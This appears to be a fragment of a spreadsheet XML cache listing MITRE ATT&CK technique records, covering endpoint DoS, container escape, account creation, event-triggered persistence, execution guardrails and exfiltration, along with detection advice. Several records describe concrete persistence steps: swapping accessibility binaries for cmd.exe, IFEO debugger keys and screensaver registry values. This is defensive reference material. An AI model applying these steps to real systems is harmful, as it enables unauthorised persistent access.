    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1499.003"/>
    <x v="176"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1499/003"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.1000000000000001"/>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_x000a__x000a_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s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1499"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1499.004"/>
    <x v="177"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1499/004"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="1"/>
    <s v="Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS."/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1499"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1499.001"/>
    <x v="178"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1499/001"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>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s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1499"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1499.002"/>
    <x v="179"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1499/002"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.2"/>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_x000a__x000a_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_x000a__x000a_Externally monitor the availability of services that may be targeted by an Endpoint DoS."/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1499"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1611"/>
    <x v="180"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1611"/>
    <d v="2021-03-30T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1"/>
    <x v="16"/>
    <s v="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
    <s v="Containers, Linux, Windows"/>
    <s v="Container: Container Creation, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; David Fiser, @anu4is, Trend Micro; Idan Frimark, Cisco; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <s v="Administrator, User, root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1585"/>
    <x v="181"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)"/>
    <s v="https://attack.mitre.org/techniques/T1585"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="4"/>
    <s v="Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization._x000a__x000a_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0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1585.002"/>
    <x v="182"/>
    <s v="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_x000a__x000a_To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)"/>
    <s v="https://attack.mitre.org/techniques/T1585/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1"/>
    <s v="T1585"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1585.001"/>
    <x v="183"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1585/001"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization._x000a__x000a_Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1585"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546"/>
    <x v="184"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. "/>
    <s v="https://attack.mitre.org/techniques/T1546"/>
    <d v="2020-01-22T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. _x000a__x000a_Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. _x000a__x000a_Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  _x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.008"/>
    <x v="185"/>
    <s v="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_x000a__x000a_Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as &quot;sticky keys&quot;, and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)_x000a__x000a_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_x000a__x000a_For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with &quot;cmd.exe&quot;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_x000a__x000a_Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)_x000a__x000a_* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;_x000a_* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;_x000a_* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;_x000a_* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;_x000a_* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;"/>
    <s v="https://attack.mitre.org/techniques/T1546/008"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Paul Speulstra, AECOM Global Security Operations Center"/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.009"/>
    <x v="186"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/009"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <m/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.010"/>
    <x v="187"/>
    <s v="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_x000a__x000a_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_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)"/>
    <s v="https://attack.mitre.org/techniques/T1546/010"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) _x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.011"/>
    <x v="188"/>
    <s v="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_x000a__x000a_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_x000a__x000a_A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:_x000a__x000a_* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and_x000a_* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;_x000a__x000a_Custom databases are stored in:_x000a__x000a_* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and_x000a_* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/011"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):_x000a__x000a_* Shim-Process-Scanner - checks memory of every running process for any shim flags_x000a_* Shim-Detector-Lite - detects installation of custom shim databases_x000a_* Shim-Guard - monitors registry for any shim installations_x000a_* ShimScanner - forensic tool to find active shims in memory_x000a_* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)_x000a__x000a_Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.001"/>
    <x v="189"/>
    <s v="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_x000a__x000a_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_x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;_x000a__x000a_The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"/>
    <s v="https://attack.mitre.org/techniques/T1546/001"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process._x000a__x000a_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_x000a__x000a_Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Stefan Kanthak; Travis Smith, Tripwire"/>
    <s v="Administrator, SYSTEM, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.015"/>
    <x v="190"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/015"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. "/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Elastic"/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.014"/>
    <x v="191"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/014"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Ivan Sinyakov"/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.012"/>
    <x v="192"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)_x000a__x000a_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_x000a__x000a_Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)"/>
    <s v="https://attack.mitre.org/techniques/T1546/012"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Oddvar Moe, @oddvarmoe"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.006"/>
    <x v="193"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/006"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <m/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.007"/>
    <x v="194"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/007"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Matthew Demaske, Adaptforward"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.013"/>
    <x v="195"/>
    <s v="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_x000a__x000a_[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_x000a__x000a_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_x000a__x000a_An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)"/>
    <s v="https://attack.mitre.org/techniques/T1546/013"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:_x000a__x000a_* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;_x000a_* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;_x000a_* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;_x000a_* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;_x000a__x000a_Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Allen DeRyke, ICE"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.002"/>
    <x v="196"/>
    <s v="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_x000a__x000a_The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:_x000a__x000a_* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path_x000a_* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver_x000a_* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock_x000a_* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed_x000a__x000a_Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)"/>
    <s v="https://attack.mitre.org/techniques/T1546/002"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior._x000a__x000a_Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Bartosz Jerzman"/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.005"/>
    <x v="197"/>
    <s v="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_x000a__x000a_Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where &quot;command list&quot; will be executed when &quot;signals&quot; are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)"/>
    <s v="https://attack.mitre.org/techniques/T1546/005"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.004"/>
    <x v="198"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1546/004"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) _x000a__x000a_For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file._x000a_"/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Robert Wilson; Tony Lambert, Red Canary"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1546.003"/>
    <x v="199"/>
    <s v="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_x000a__x000a_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_x000a__x000a_WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges."/>
    <s v="https://attack.mitre.org/techniques/T1546/003"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, WMI: WMI Creation"/>
    <b v="1"/>
    <s v="T1546"/>
    <s v="Brent Murphy, Elastic; David French, Elastic"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1480"/>
    <x v="200"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1480"/>
    <d v="2019-01-31T00:00:00"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Nick Carr, FireEye"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1480.001"/>
    <x v="201"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1480/001"/>
    <d v="2020-06-23T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1480"/>
    <s v="Nick Carr, FireEye"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1048"/>
    <x v="202"/>
    <s v="Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  _x000a__x000a_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_x000a__x000a_[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) "/>
    <s v="https://attack.mitre.org/techniques/T1048"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1.2"/>
    <x v="8"/>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Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Abarca"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1048.002"/>
    <x v="203"/>
    <s v="Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. _x000a__x000a_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_x000a__x000a_Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. "/>
    <s v="https://attack.mitre.org/techniques/T1048/002"/>
    <d v="2020-03-15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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1048"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1048.001"/>
    <x v="204"/>
    <s v="Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. _x000a__x000a_Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1048/001"/>
    <d v="2020-03-15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_x000a__x000a_Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. "/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1048"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1048.003"/>
    <x v="205"/>
    <s v="Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1048/003"/>
    <d v="2020-03-15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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1048"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1041"/>
    <x v="206"/>
    <s v="Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications."/>
    <s v="https://attack.mitre.org/techniques/T1041"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="2"/>
    <x v="8"/>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Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1011"/>
    <x v="207"/>
    <s v="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_x000a__x000a_Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network"/>
    <s v="https://attack.mitre.org/techniques/T1011"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="8"/>
    <s v="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_x000a__x000a_Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Itzik Kotler, SafeBreach"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1011.001"/>
    <x v="208"/>
    <s v="Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel._x000a__x000a_Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network."/>
    <s v="https://attack.mitre.org/techniques/T1011/001"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="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_x000a__x000a_Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1052"/>
    <x v="209"/>
    <s v="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
